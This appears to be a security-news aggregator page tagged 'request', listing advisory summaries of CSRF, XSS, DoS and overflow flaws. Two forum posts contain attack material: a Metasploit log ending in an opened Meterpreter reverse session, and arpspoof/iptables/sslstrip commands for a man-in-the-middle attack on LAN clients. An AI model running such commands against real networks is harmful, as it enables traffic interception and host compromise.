9:00
Bugtraq: HTB22959: CSRF (Cross-Site Request Forgery) in phpGraphy
» ‎ SecurityFocus Vulnerabilities

HTB22959: CSRF (Cross-Site Request Forgery) in phpGraphy
Tags: request csrf site bugtraq forgery

April 27, 2011
7:44
phpwcms 1.4.7 Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

phpwcms version 1.4.7 add administrator cross site request forgery exploit.
Tags: cross request site forgery

7:44
phpwcms 1.4.7 Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

phpwcms version 1.4.7 add administrator cross site request forgery exploit.
Tags: cross request site forgery

7:44
phpwcms 1.4.7 Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

phpwcms version 1.4.7 add administrator cross site request forgery exploit.
Tags: cross request site forgery

April 22, 2011
9:59
Ariadne 2.7.4 Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

Ariadne version 2.7.4 suffers from a cross site request forgery vulnerability.
Tags: cross request site ariadne forgery vulnerability

9:59
Ariadne 2.7.4 Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

Ariadne version 2.7.4 suffers from a cross site request forgery vulnerability.
Tags: cross request site ariadne forgery vulnerability

9:59
Ariadne 2.7.4 Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

Ariadne version 2.7.4 suffers from a cross site request forgery vulnerability.
Tags: cross request site ariadne forgery vulnerability

April 08, 2011
0:00
Vuln: Linux Kernel Request Handling 'cm.c' Denial of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

Linux Kernel Request Handling 'cm.c' Denial of Service Vulnerability
Tags: request kernel linux service-vulnerability linux-kernel denial-of-service

April 07, 2011
14:59
e107 0.7.25 Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

A cross site request forgery vulnerability in e107 version 0.7.25 can be exploited to grant admin privileges.
Tags: cross request site admin-privileges forgery vulnerability

14:59
e107 0.7.25 Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

A cross site request forgery vulnerability in e107 version 0.7.25 can be exploited to grant admin privileges.
Tags: cross request site admin-privileges forgery vulnerability

14:59
e107 0.7.25 Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

A cross site request forgery vulnerability in e107 version 0.7.25 can be exploited to grant admin privileges.
Tags: cross request site admin-privileges forgery vulnerability

March 24, 2011
11:04
GroupOffice 3.6.22 Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

A cross-site request forgery vulnerability in GroupOffice version 3.6.22 can be exploited to create a new admin.
Tags: request forgery groupoffice vulnerability

11:04
GroupOffice 3.6.22 Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

A cross-site request forgery vulnerability in GroupOffice version 3.6.22 can be exploited to create a new admin.
Tags: request forgery groupoffice vulnerability

11:04
GroupOffice 3.6.22 Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

A cross-site request forgery vulnerability in GroupOffice version 3.6.22 can be exploited to create a new admin.
Tags: request forgery groupoffice vulnerability

March 23, 2011
11:18
PHP-Nuke 8.x Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

PHP-Nuke version 8.x suffers from anti-csrf bypass and cross site request forgery vulnerabilities.
Tags: php-nuke request site forgery

11:18
PHP-Nuke 8.x Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

PHP-Nuke version 8.x suffers from anti-csrf bypass and cross site request forgery vulnerabilities.
Tags: php-nuke request site forgery

11:18
PHP-Nuke 8.x Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

PHP-Nuke version 8.x suffers from anti-csrf bypass and cross site request forgery vulnerabilities.
Tags: php-nuke request site forgery

February 16, 2011
8:27
Apache Archiva 1.3.3 Cross Site Scripting
» ‎ Packet Storm Security Advisories

A request that included a specially crafted request parameter could be used to inject arbitrary HTML or Javascript into the Apache Archiva user management page. Versions 1.3.3 and earlier are affected.
Tags: archiva request apache arbitrary-html page-versions

8:27
Apache Archiva 1.3.3 Cross Site Scripting
» ‎ Packet Storm Security Recent Files

A request that included a specially crafted request parameter could be used to inject arbitrary HTML or Javascript into the Apache Archiva user management page. Versions 1.3.3 and earlier are affected.
Tags: archiva request apache arbitrary-html page-versions

8:27
Apache Archiva 1.3.3 Cross Site Scripting
» ‎ Packet Storm Security Misc. Files

A request that included a specially crafted request parameter could be used to inject arbitrary HTML or Javascript into the Apache Archiva user management page. Versions 1.3.3 and earlier are affected.
Tags: archiva request apache arbitrary-html page-versions

February 10, 2011
8:22
Apache Continuum Cross Site Scripting
» ‎ Packet Storm Security Advisories

A request that included a specially crafted request parameter could be used to inject arbitrary HTML or Javascript into Continuum project pages. Versions 1.3.6 and 1.4.0 Beta are affected along with unsupported, older revs.
Tags: request continuum apache beta arbitrary-html cross-site-scripting revs

8:22
Apache Continuum Cross Site Scripting
» ‎ Packet Storm Security Misc. Files

A request that included a specially crafted request parameter could be used to inject arbitrary HTML or Javascript into Continuum project pages. Versions 1.3.6 and 1.4.0 Beta are affected along with unsupported, older revs.
Tags: request continuum apache beta arbitrary-html cross-site-scripting revs

February 05, 2011
10:02
Apache Tomcat Denial Of Service
» ‎ Packet Storm Security Advisories

Tomcat did not enforce the maxHttpHeaderSize limit while parsing the request line in the NIO HTTP connector. A specially crafted request could trigger an DoS via an OutOfMemoryError. Versions 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 are affected.
Tags: tomcat request apache apache-tomcat outofmemoryerror denial-of-service

10:02
Apache Tomcat Denial Of Service
» ‎ Packet Storm Security Recent Files

Tomcat did not enforce the maxHttpHeaderSize limit while parsing the request line in the NIO HTTP connector. A specially crafted request could trigger an DoS via an OutOfMemoryError. Versions 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 are affected.
Tags: tomcat request apache apache-tomcat outofmemoryerror denial-of-service

10:02
Apache Tomcat Denial Of Service
» ‎ Packet Storm Security Misc. Files

Tomcat did not enforce the maxHttpHeaderSize limit while parsing the request line in the NIO HTTP connector. A specially crafted request could trigger an DoS via an OutOfMemoryError. Versions 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 are affected.
Tags: tomcat request apache apache-tomcat outofmemoryerror denial-of-service

January 22, 2011
0:00
Vuln: Request Tracker Password Information Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

Request Tracker Password Information Disclosure Vulnerability
Tags: request password tracker information-disclosure-vulnerability request-tracker
January 21, 2011
0:00
Vuln: Oracle Database Vault Cross-Site Request Forgery Vulnerability
» ‎ SecurityFocus Vulnerabilities

Oracle Database Vault Cross-Site Request Forgery Vulnerability
Tags: oracle request site oracle-database forgery vault
January 19, 2011
0:00
Vuln: lighttpd Slow Request Handling Remote Denial Of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

lighttpd Slow Request Handling Remote Denial Of Service Vulnerability
Tags: lighttpd slow request service-vulnerability denial-of-service

January 11, 2011
9:22
whCMS 0.115 Alpha Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

whCMS version 0.115 Alpha suffers from a cross site request forgery vulnerability.
Tags: request whcms site alpha-cross alpha forgery vulnerability

9:22
whCMS 0.115 Alpha Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

whCMS version 0.115 Alpha suffers from a cross site request forgery vulnerability.
Tags: request whcms site alpha-cross alpha forgery vulnerability

9:22
whCMS 0.115 Alpha Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

whCMS version 0.115 Alpha suffers from a cross site request forgery vulnerability.
Tags: request whcms site alpha-cross alpha forgery vulnerability

January 05, 2011
0:00
Vuln: OpenLDAP 'modrdn' Request Multiple Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

OpenLDAP 'modrdn' Request Multiple Vulnerabilities
Tags: request modrdn openldap vulnerabilities
December 30, 2010
10:01
Bugtraq: CSRF (Cross-Site Request Forgery) in Open blog
» ‎ SecurityFocus Vulnerabilities

CSRF (Cross-Site Request Forgery) in Open blog
Tags: request csrf site forgery blog

December 04, 2010
17:44
TFTP GUI 1.4.5 Denial Of Service
» ‎ Packet Storm Security Exploits

The TFTPUtil GUI server version 1.4.5 can be denial of serviced by sending a specially crafted read request. Depending on the setup, sending write request "\x00\x02" may also work. This is written as a Metasploit module.
Tags: request denial gui metasploit denial-of-service tftp

17:44
TFTP GUI 1.4.5 Denial Of Service
» ‎ Packet Storm Security Recent Files

The TFTPUtil GUI server version 1.4.5 can be denial of serviced by sending a specially crafted read request. Depending on the setup, sending write request "\x00\x02" may also work. This is written as a Metasploit module.
Tags: request denial gui metasploit denial-of-service tftp

17:44
TFTP GUI 1.4.5 Denial Of Service
» ‎ Packet Storm Security Misc. Files

The TFTPUtil GUI server version 1.4.5 can be denial of serviced by sending a specially crafted read request. Depending on the setup, sending write request "\x00\x02" may also work. This is written as a Metasploit module.
Tags: request denial gui metasploit denial-of-service tftp

November 25, 2010
9:22
Wolf CMS 0.6.0b Cross Site Request Forgery / Cross Site Scripting
» ‎ Packet Storm Security Exploits

Wolf CMS version 0.6.0b suffers from cross site request forgery and cross site scripting vulnerabilities.
Tags: cross request site wolf-cms cross-site-scripting forgery cms

9:22
Wolf CMS 0.6.0b Cross Site Request Forgery / Cross Site Scripting
» ‎ Packet Storm Security Recent Files

Wolf CMS version 0.6.0b suffers from cross site request forgery and cross site scripting vulnerabilities.
Tags: cross request site wolf-cms cross-site-scripting forgery cms

9:22
Wolf CMS 0.6.0b Cross Site Request Forgery / Cross Site Scripting
» ‎ Packet Storm Security Misc. Files

Wolf CMS version 0.6.0b suffers from cross site request forgery and cross site scripting vulnerabilities.
Tags: cross request site wolf-cms cross-site-scripting forgery cms

November 02, 2010
20:01
MDVSA-2010-202-1.txt
» ‎ Packet Storm Security Recent Files

Mandriva Linux Security Advisory 2010-202 - The merge_authdata function in kdc_authdata.c in the Key Distribution Center 1.8.x before 1.8.4 does not properly manage an index into an authorization-data list, which allows remote attackers to cause a denial of service , or possibly obtain sensitive information, spoof authorization, or execute arbitrary code, via a TGS request, as demonstrated by a request from a Windows Active Directory client. The updated packages have been patched to correct this issue. Update packages for MES5 were missing with the MDVSA-2010:202 advisory. This advisory provides the update packages.
Tags: authdata request update active-directory-client denial-of-service linux-security

20:01
MDVSA-2010-202-1.txt
» ‎ Packet Storm Security Advisories

Mandriva Linux Security Advisory 2010-202 - The merge_authdata function in kdc_authdata.c in the Key Distribution Center 1.8.x before 1.8.4 does not properly manage an index into an authorization-data list, which allows remote attackers to cause a denial of service , or possibly obtain sensitive information, spoof authorization, or execute arbitrary code, via a TGS request, as demonstrated by a request from a Windows Active Directory client. The updated packages have been patched to correct this issue. Update packages for MES5 were missing with the MDVSA-2010:202 advisory. This advisory provides the update packages.
Tags: authdata request update active-directory-client denial-of-service linux-security

October 25, 2010
0:00
Vuln: Microsoft IIS Request Header Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

Microsoft IIS Request Header Buffer Overflow Vulnerability
Tags: request microsoft iis buffer-overflow-vulnerability request-header microsoft-iis

October 21, 2010
23:02
SA-20101021-0.txt
» ‎ Packet Storm Security Recent Files

Sawmill Enterprise versions prior to 8.1.7.3 suffers from arbitrary code execution, cross site request forgery, cross site scripting and various other vulnerabilities. suffers from buffer overflow, cross site request forgery, cross site scripting and file disclosure vulnerabilities.
Tags: cross request site arbitrary-code-execution cross-site-scripting buffer-overflow

23:01
SA-20101021-0.txt
» ‎ Packet Storm Security Exploits

Sawmill Enterprise versions prior to 8.1.7.3 suffers from arbitrary code execution, cross site request forgery, cross site scripting and various other vulnerabilities. suffers from buffer overflow, cross site request forgery, cross site scripting and file disclosure vulnerabilities.
Tags: cross request site arbitrary-code-execution cross-site-scripting buffer-overflow

October 13, 2010
21:01
MDVSA-2010-202.txt
» ‎ Packet Storm Security Recent Files

Mandriva Linux Security Advisory 2010-202 - The merge_authdata function in kdc_authdata.c in the Key Distribution Center 1.8.x before 1.8.4 does not properly manage an index into an authorization-data list, which allows remote attackers to cause a denial of service , or possibly obtain sensitive information, spoof authorization, or execute arbitrary code, via a TGS request, as demonstrated by a request from a Windows Active Directory client. The updated packages have been patched to correct this issue.
Tags: authdata mdvsa request active-directory-client denial-of-service linux-security

21:00
MDVSA-2010-202.txt
» ‎ Packet Storm Security Advisories

Mandriva Linux Security Advisory 2010-202 - The merge_authdata function in kdc_authdata.c in the Key Distribution Center 1.8.x before 1.8.4 does not properly manage an index into an authorization-data list, which allows remote attackers to cause a denial of service , or possibly obtain sensitive information, spoof authorization, or execute arbitrary code, via a TGS request, as demonstrated by a request from a Windows Active Directory client. The updated packages have been patched to correct this issue.
Tags: authdata mdvsa request active-directory-client denial-of-service linux-security

September 21, 2010
0:00
Vuln: OpenLDAP 'modrdn' Request Multiple Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

OpenLDAP 'modrdn' Request Multiple Vulnerabilities
Tags: request modrdn openldap vulnerabilities

0:00
Feds' Request For Google Data Rise 20 Percent
» ‎ Packet Storm Security Headlines

Feds' Request For Google Data Rise 20 Percent
Tags: google request feds

September 20, 2010
0:00
Vuln: Microsoft IIS Request Header Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

Microsoft IIS Request Header Buffer Overflow Vulnerability
Tags: request microsoft iis buffer-overflow-vulnerability request-header microsoft-iis

September 03, 2010
18:45
HTTPS for forums.???
» ‎ remote-exploit & backtrack

Hi!

This is a simple request, can we please have the ability to use https with the forum?

I like this place, I'ld like it to be safe from sniffing.

Thanks :)
Tags: https ability request simple-request General Discussion

0:00
Vuln: OpenLDAP 'modrdn' Request Multiple Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

OpenLDAP 'modrdn' Request Multiple Vulnerabilities
Tags: request modrdn openldap vulnerabilities

August 27, 2010
15:49
Pc4Uploader 9.0 Cross-site Request Forgery
» ‎ 1337day (was: Inj3ct0r, 1337db)

Pc4Uploader 9.0 Cross-site Request Forgery
Tags: cross-site request forgery

August 18, 2010
0:00
Vuln: OpenLDAP 'modrdn' Request Multiple Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

OpenLDAP 'modrdn' Request Multiple Vulnerabilities
Tags: request modrdn openldap vulnerabilities
August 12, 2010
0:00
Vuln: SquirrelMail Form Submissions Cross Site Request Forgery Vulnerability
» ‎ SecurityFocus Vulnerabilities

SquirrelMail Form Submissions Cross Site Request Forgery Vulnerability
Tags: request squirrelmail site forgery vulnerability submissions
August 10, 2010
0:00
Vuln: OpenLDAP 'modrdn' Request Multiple Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

OpenLDAP 'modrdn' Request Multiple Vulnerabilities
Tags: request modrdn openldap vulnerabilities
August 02, 2010
0:00
Vuln: OpenLDAP 'modrdn' Request Multiple Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

OpenLDAP 'modrdn' Request Multiple Vulnerabilities
Tags: request modrdn openldap vulnerabilities

July 29, 2010
20:27
Quicksilver Forums Cross-Site Request Forgery Vulnerability
» ‎ SecuriTeam

A vulnerability was discovered in Quicksilver Forums, which can be exploited by malicious people to conduct cross-site request forgery attacks.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!

Tags: Forums quicksilver request safer-use forgery vulnerability

0:00
Vuln: OpenLDAP 'modrdn' Request Multiple Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

OpenLDAP 'modrdn' Request Multiple Vulnerabilities
Tags: request modrdn openldap vulnerabilities
July 28, 2010
0:00
Vuln: OpenLDAP 'modrdn' Request Multiple Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

OpenLDAP 'modrdn' Request Multiple Vulnerabilities
Tags: request modrdn openldap vulnerabilities

July 27, 2010
19:01
MDVSA-2010-141.txt
» ‎ Packet Storm Security Recent Files

Mandriva Linux Security Advisory 2010-141 - The chain_reply function in process.c in smbd in Samba before 3.4.8 and 3.5.x before 3.5.2 allows remote attackers to cause a denial of service via a Negotiate Protocol request with a certain 0x0003 field value followed by a Session Setup AndX request with a certain 0x8003 field value. The reply_sesssetup_and_X_spnego function in sesssetup.c in smbd in Samba before 3.4.8 and 3.5.x before 3.5.2 allows remote attackers to trigger an out-of-bounds read, and cause a denial of service (process crash), via a \\xff\\xff security blob length in a Session Setup AndX request. The updated packages provides samba 3.4.8 which is not vulnerable to these issues.
Tags: samba request security reply-function session-setup denial-of-service

19:00
MDVSA-2010-141.txt
» ‎ Packet Storm Security Advisories

Mandriva Linux Security Advisory 2010-141 - The chain_reply function in process.c in smbd in Samba before 3.4.8 and 3.5.x before 3.5.2 allows remote attackers to cause a denial of service via a Negotiate Protocol request with a certain 0x0003 field value followed by a Session Setup AndX request with a certain 0x8003 field value. The reply_sesssetup_and_X_spnego function in sesssetup.c in smbd in Samba before 3.4.8 and 3.5.x before 3.5.2 allows remote attackers to trigger an out-of-bounds read, and cause a denial of service (process crash), via a \\xff\\xff security blob length in a Session Setup AndX request. The updated packages provides samba 3.4.8 which is not vulnerable to these issues.
Tags: samba request security reply-function session-setup denial-of-service

July 20, 2010
0:00
Vuln: OpenLDAP 'modrdn' Request Multiple Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

OpenLDAP 'modrdn' Request Multiple Vulnerabilities
Tags: request modrdn openldap vulnerabilities

July 14, 2010
19:02
PR09-16.txt
» ‎ Packet Storm Security Exploits

Procheckup has found by making a malformed request to the Juniper IVE Web interface without authentication, that a vanilla cross site scripting (XSS) attack is possible.
Tags: txt procheckup request juniper-ive malformed-request web-interface juniper

July 07, 2010
0:00
Vuln: EvoCam HTTP GET Request Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

EvoCam HTTP GET Request Buffer Overflow Vulnerability
Tags: request http get buffer-overflow-vulnerability evocam

June 29, 2010
1:00
bbPress v1.0.2 Cross-Site Request Forgery
» ‎ 1337day (was: Inj3ct0r, 1337db)

bbPress v1.0.2 Cross-Site Request Forgery
Tags: cross request site forgery
June 21, 2010
1:00
PHPWCMS 1.4.5 r389 Cross Site Request Forgery Vulnerability
» ‎ 1337day (was: Inj3ct0r, 1337db)

PHPWCMS 1.4.5 r389 Cross Site Request Forgery Vulnerability
Tags: cross request site forgery vulnerability

June 16, 2010
23:02
MDVSA-2010-117.txt
» ‎ Packet Storm Security Recent Files

Mandriva Linux Security Advisory 2010-117 - SQL injection vulnerability in graph.php in Cacti 0.8.7e and earlier allows remote attackers to execute arbitrary SQL commands via the rra_id parameter in a GET request in conjunction with a valid rra_id value in a POST request or a cookie, which bypasses the validation routine. The updated packages have been patched to correct this issue.
Tags: rra request sql validation-routine linux-security sql-commands

23:00
MDVSA-2010-117.txt
» ‎ Packet Storm Security Advisories

Mandriva Linux Security Advisory 2010-117 - SQL injection vulnerability in graph.php in Cacti 0.8.7e and earlier allows remote attackers to execute arbitrary SQL commands via the rra_id parameter in a GET request in conjunction with a valid rra_id value in a POST request or a cookie, which bypasses the validation routine. The updated packages have been patched to correct this issue.
Tags: rra request sql validation-routine linux-security sql-commands

June 15, 2010
0:00
Vuln: EvoCam HTTP GET Request Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

EvoCam HTTP GET Request Buffer Overflow Vulnerability
Tags: request http get buffer-overflow-vulnerability evocam
June 03, 2010
0:00
Vuln: lighttpd Slow Request Handling Remote Denial Of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

lighttpd Slow Request Handling Remote Denial Of Service Vulnerability
Tags: lighttpd slow request service-vulnerability denial-of-service
May 12, 2010
0:00
Vuln: lighttpd Slow Request Handling Remote Denial Of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

lighttpd Slow Request Handling Remote Denial Of Service Vulnerability
Tags: lighttpd slow request service-vulnerability denial-of-service

May 04, 2010
4:46
metasploit > java_ws_arginject_altjvm problem
» ‎ remote-exploit & backtrack

This metasploit module fails to work, if i use it over the internet. In a lan-area it works pretty well.

Code: msf exploit(java_ws_arginject_altjvm) > exploit [*] Exploit running as background job. [-] Handler failed to bind to 95.X.X.X:6113 [*] Started reverse handler on 0.0.0.0:6113 [*] Using URL: hxxp://0.0.0.0:80/ [*] Local IP: hxxp://192.168.0.5:80/ [*] Server started. [*] Request for "/" does not contain a sub-directory, redirecting to /3QZOcxOo/ ... [*] Responding to "GET /3QZOcxOo/" request from 95.X.X.X:60576 [*] Sending js detection HTML to 95.X.X.X:60576... [*] Responding to "GET /3QZOcxOo/uUW6gpQfujicR.shtml" request from 95.X.X.X:61148 [*] Sending JS version HTML to 95.X.X.X:61148... [*] Responding to WebDAV "OPTIONS /" request from 192.168.0.10:1042 [*] Request for "/3QZOcxOo" does not contain a sub-directory, redirecting to /3QZOcxOo/ ... [*] Received WebDAV "PROPFIND /3QZOcxOo/" request from 192.168.0.10:1042 [*] Sending directory multistatus for /3QZOcxOo/ ... [*] Request for "/3QZOcxOo" does not contain a sub-directory, redirecting to /3QZOcxOo/ ... [*] Received WebDAV "PROPFIND /3QZOcxOo/" request from 192.168.0.10:1042 [*] Sending directory multistatus for /3QZOcxOo/ ... [*] Received WebDAV "PROPFIND /3QZOcxOo/jvm.dll" request from 192.168.0.10:1042 [*] Sending DLL multistatus for /3QZOcxOo/jvm.dll ... [*] Responding to "GET /3QZOcxOo/jvm.dll" request from 192.168.0.10:1042 [*] Sending DLL to 192.168.0.10:1042... [*] Sending stage (748032 bytes) to 95.X.X.X [*] Meterpreter session 1 opened (192.168.0.5:6113 -> 95.X.X.X:60066) at 2010-05-04 12:47:22 +0100
same problem as the guy on top (hxxp://blog.metasploit.com/2010/04/java-web-start-argument-injection.html?showComment=1271428170411#c50095338 63542996215 )

jduck answered that this results from a not running WebClient service, but in my test case it is definitely running.

webdav is switching to the internal ip, maybe this is the problem.
Code: [*] Responding to WebDAV "OPTIONS /" request from 192.168.0.10:1042
Tags: qzocxoo quot request x.x.x java-web-start background-job propfind Pentesting

March 23, 2010
0:00
Vuln: WebKit Cross-Origin Stylesheet Request Information Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

WebKit Cross-Origin Stylesheet Request Information Disclosure Vulnerability
Tags: cross request stylesheet information-disclosure-vulnerability

March 10, 2010
19:00
USN-908-1.txt
» ‎ Packet Storm Security Recent Files

Ubuntu Security Notice 908-1 - It was discovered that mod_proxy_ajp did not properly handle errors when a client doesn't send a request body. A remote attacker could exploit this with a crafted request and cause a denial of service. This issue affected Ubuntu 8.04 LTS, 8.10, 9.04 and 9.10. It was discovered that Apache did not properly handle headers in subrequests under certain conditions. A remote attacker could exploit this with a crafted request and possibly obtain sensitive information from previous requests.
Tags: attacker ubuntu request denial-of-service request-body ajp

19:00
USN-908-1.txt
» ‎ Packet Storm Security Advisories

Ubuntu Security Notice 908-1 - It was discovered that mod_proxy_ajp did not properly handle errors when a client doesn't send a request body. A remote attacker could exploit this with a crafted request and cause a denial of service. This issue affected Ubuntu 8.04 LTS, 8.10, 9.04 and 9.10. It was discovered that Apache did not properly handle headers in subrequests under certain conditions. A remote attacker could exploit this with a crafted request and possibly obtain sensitive information from previous requests.
Tags: attacker ubuntu request denial-of-service request-body ajp

March 08, 2010
14:00
MDVSA-2010-057.txt
» ‎ Packet Storm Security Recent Files

Mandriva Linux Security Advisory 2010-057 - The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request. Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers. The updated packages have been patched to correct this issue.
Tags: mdvsa server request apache-http-server mandriva-linux request-function

14:00
MDVSA-2010-057.txt
» ‎ Packet Storm Security Advisories

Mandriva Linux Security Advisory 2010-057 - The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request. Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers. The updated packages have been patched to correct this issue.
Tags: mdvsa server request apache-http-server mandriva-linux request-function

March 02, 2010
19:00
MDVSA-2010-053.txt
» ‎ Packet Storm Security Recent Files

Mandriva Linux Security Advisory 2010-053 - mod_proxy_ajp: Respond with HTTP_BAD_REQUEST when the body is not sent after request headers indicate a request body is incoming; this is not a case of HTTP_INTERNAL_SERVER_ERROR. Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers. The updated packages have been patched to correct this issue.
Tags: request http body internal-server-error mandriva-linux corporate-desktop

19:00
MDVSA-2010-053.txt
» ‎ Packet Storm Security Advisories

Mandriva Linux Security Advisory 2010-053 - mod_proxy_ajp: Respond with HTTP_BAD_REQUEST when the body is not sent after request headers indicate a request body is incoming; this is not a case of HTTP_INTERNAL_SERVER_ERROR. Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers. The updated packages have been patched to correct this issue.
Tags: request http body internal-server-error mandriva-linux corporate-desktop

February 27, 2010

Permalink for 'sslstrip behind a proxy server'

0:48

sslstrip behind a proxy server

» ‎ remote-exploit & backtrack

sslstrip is failing when used in a proxy environment. For example, all the clients on LAN use someserver:8080 as their web proxy. I'm starting sslstrip with the following commands:

Code:

iptables -t nat -A PREROUTING -p tcp --destination-port 8080 -j REDIRECT --to-port 10000

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

echo "1" > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth0 [gateway ip]

sslstrip -w debug.log -k -p -l 10000

Clients hang when trying to use SSL websites. The debug log contains repetitions of:

Quote:

2010-02-04 14:55:47,663 Sending request via HTTP...
2010-02-04 14:55:47,670 Server connection failed.
2010-02-04 14:55:47,670 Retrying via SSL
2010-02-04 14:55:47,674 Server connection failed.
2010-02-04 14:55:47,678 Sending request via HTTP...
2010-02-04 14:55:47,723 Server connection failed.
2010-02-04 14:55:47,723 Retrying via SSL
2010-02-04 14:55:47,729 Server connection failed.
2010-02-04 14:55:47,732 Sending request via HTTP...
2010-02-04 14:55:47,735 Server connection failed.
2010-02-04 14:55:47,735 Retrying via SSL
2010-02-04 14:55:47,814 Sending request via HTTP...
2010-02-04 14:55:47,899 Sending request via HTTP...
2010-02-04 14:55:47,955 Sending request via HTTP...
2010-02-04 14:55:47,964 Sending request via HTTP...
2010-02-04 14:55:47,974 Sending request via HTTP...
2010-02-04 14:55:48,047 Sending request via HTTP...
2010-02-04 14:55:48,059 Sending request via HTTP...
2010-02-04 14:55:48,062 Server connection failed.
2010-02-04 14:55:48,062 Retrying via SSL
2010-02-04 14:55:50,218 Sending request via HTTP...

Any ideas what might solve this issue?

Tags: sending request http lan server-connection destination-port gateway-ip BackTrack General Support

February 09, 2010
0:00
Vuln: lighttpd Slow Request Handling Remote Denial Of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

lighttpd Slow Request Handling Remote Denial Of Service Vulnerability
Tags: lighttpd slow request service-vulnerability denial-of-service
February 02, 2010
0:00
Vuln: lighttpd Slow Request Handling Remote Denial Of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

lighttpd Slow Request Handling Remote Denial Of Service Vulnerability
Tags: lighttpd slow request service-vulnerability denial-of-service

January 28, 2010
10:51
Problemas con "Sending Authentication Request"
» ‎ remote-exploit & backtrack

Olas a todos
bueno les cuento soy nuevo en este foro y he tenido un problema sobre ste programa :/

tengo el backtracks 3, una tarjeta atheros AR5005G y un tutorial para funcionar el software.....

hago todos los pasos y hasta ahi todo bien pero cuando quiero injectar me sale esto:

Sending Authentication Request
Sending Authentication Request
Sending Authentication Request

como 5 o 6 veces mas y me sale cmo 6 opciones pk no se ha podido injectar

alguna ayuda por favor??

gracias
Tags: sending authentication request authentication-request backtracks atheros-ar5005g Soporte Wireless

January 21, 2010
23:00
hp_nnm_ovalarm_lang.rb.txt
» ‎ Packet Storm Security Recent Files

This Metasploit module exploits a stack overflow in HP OpenView Network Node Manager 7.53. By sending a specially crafted CGI request to ovalarm.exe, an attacker can execute arbitrary code. This specific vulnerability is due to a call to sprintf_new in the isWide function within ovalarm.exe . A stack buffer overflow occurs when processing an HTTP request that contains the following. 1. An Accept-Language header longer than 100 bytes 2. An OVABverbose URI variable set to on , true or 1 The vulnerability is related to _WebSession::GetWebLocale() .. NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.
Tags: request overflow ovalarm uri network-node-manager stack-overflow stack-buffer

23:00
hp_nnm_ovalarm_lang.rb.txt
» ‎ Packet Storm Security Exploits

This Metasploit module exploits a stack overflow in HP OpenView Network Node Manager 7.53. By sending a specially crafted CGI request to ovalarm.exe, an attacker can execute arbitrary code. This specific vulnerability is due to a call to sprintf_new in the isWide function within ovalarm.exe . A stack buffer overflow occurs when processing an HTTP request that contains the following. 1. An Accept-Language header longer than 100 bytes 2. An OVABverbose URI variable set to on , true or 1 The vulnerability is related to _WebSession::GetWebLocale() .. NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.
Tags: request overflow ovalarm uri network-node-manager stack-overflow stack-buffer

jetlib.sec » Tags » request

Feeds

177 items tagged "request"

Tags: multiple request tracker request-tracker security-vulnerabilities

Tags: request denial snmp service-vulnerability denial-of-service

Tags: request tomcat apache apache-tomcat object-security request-object

Tags: cve request planeshift buffer-overflow

Tags: cve request planeshift buffer-overflow

Tags: cve request planeshift buffer-overflow

Tags: request denial snmp service-vulnerability denial-of-service

Tags: request webdav reading

Tags: request takeover liferay proof-of-concept attacker version-6

Tags: request takeover liferay proof-of-concept attacker version-6

Tags: cross request site forgery idev vulnerability

Tags: cross request site forgery idev vulnerability

Tags: cross request site forgery idev vulnerability

Tags: andx request samba buffer-overflow-vulnerability based-buffer-overflow

Tags: request tomcat apache apache-tomcat object-security request-object

Tags: request forgery site a.m.y.-cross a.m.y vulnerability

Tags: request forgery site a.m.y.-cross a.m.y vulnerability

